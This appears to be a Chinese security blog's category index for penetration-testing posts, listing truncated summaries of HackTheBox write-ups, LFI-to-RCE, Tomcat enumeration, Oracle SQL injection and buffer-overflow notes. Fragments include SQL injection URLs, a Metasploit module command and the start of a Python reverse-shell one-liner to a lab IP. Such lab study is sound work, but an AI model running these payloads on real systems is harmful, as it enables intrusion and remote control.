随笔分类 - 渗透测试
摘要:Bastard Bastard是hackthebox上一台难度中等的windows靶机 信息收集 nmap进行端口扫描,首先扫描前100个容易受到攻击的端口 nmap进行更细致的扫描 nmap扫描是否存在漏洞 至此,nmap向我们反馈了有用的信息: 80 http 135 msrpc 49154 o
阅读全文
摘要:LFI 漏洞的利用 参考链接1 参考链接2 LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用 1、phpinfo 漏洞信息利用 将LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件: LFI漏洞 任何显示PHPInfo()配置输出的脚本 脚本下载地址 得到脚
阅读全文
摘要:Apache Tomcat 漏洞利用 参考链接1 参考链接2 通过对apache tomcat的枚举和利用,我们可以从中找出漏洞,然后得到shell 枚举 在 Tomcat6 之前的某些版本中,我们可以使用msf枚举用户: msf> use auxiliary/scanner/http/tomcat
阅读全文
摘要:基于Oracle网站的SQL注入 参考链接1 参考链接2 使用 order by 语句查询列数 www.vuln-web.com/photo.php?id=1' order by 1-- Working www.vuln-web.com/photo.php?id=1' order by 10-- w
阅读全文
摘要:反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",44
阅读全文
摘要:Hackthebox :: optimum反思和总结 optimum是hackthebox上一台简单的windows靶机 反思 这台靶机我顺利的找到了突破口,但是msf中的post/multi/recon/local_exploiter_suggester 模块并没有用 使用别人提供的windows
阅读全文
摘要:Hackthebox :: Devel反思总结 devel是hackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思 反思 对FTP服务的命令不够熟悉 对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数 总结 部分FTP
阅读全文
摘要:缓冲区溢出流程 一、Immunity Debugger 最好以管理员的身份运行Innunity debugger 通常有两种方法可以使用 Immunity Debugger 来调试应用程序: 确保应用程序正在运行,打开 Immunity Debugger,然后使用File -> Attach调试器攻
阅读全文
